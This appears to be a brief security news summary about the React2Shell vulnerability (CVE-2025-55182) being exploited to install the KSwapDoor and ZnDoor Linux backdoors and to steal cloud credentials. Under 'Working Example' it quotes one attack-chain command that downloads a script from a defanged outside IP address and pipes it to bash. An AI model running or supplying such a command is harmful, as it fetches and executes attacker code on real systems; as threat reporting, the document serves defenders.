React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors

React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors

The React2Shell vulnerability (CVE-2025-55182), a critical flaw in the React server-side rendering library, is currently being exploited by multiple threat actors to deliver Linux malware families like KSwapDoor and ZnDoor. Google has identified at least five China-nexus groups actively weaponizing this vulnerability, demonstrating its widespread appeal to attackers.

Why This Matters

Current security models often rely on patching and rapid response, but the scale of this exploitation highlights the challenge of defending against zero-day vulnerabilities impacting widely used libraries. The vulnerability allows for remote code execution, enabling attackers to deploy backdoors and steal credentials at scale; the estimated compromise of over 59,000 servers underscores the potential for significant financial and operational damage.

Key Insights

• CVE-2025-55182 (CVSS score: 10.0): Critical vulnerability in React server-side rendering.
• KSwapDoor vs. BPFDoor: Initial misclassification of KSwapDoor highlights the importance of thorough malware analysis; KSwapDoor features a complex peer-to-peer router for lateral movement, unlike BPFDoor.
• Operation PCPcat: Campaign impacting over 59,128 servers, demonstrating large-scale intelligence gathering and data exfiltration.

Working Example

# Example ZnDoor attack chain (from NTT Security report)
wget http://45.76.155[.]14/payload.sh | bash

Practical Applications

• Cloud Providers: AWS, Azure, and GCP are being targeted for credential theft via IMDS endpoints.
• Pitfall: Reliance on basic input validation can leave applications vulnerable to remote code execution exploits like React2Shell, leading to complete system compromise.

References:

• https://thehackernews.com/2025/12/react2shell-vulnerability-actively.html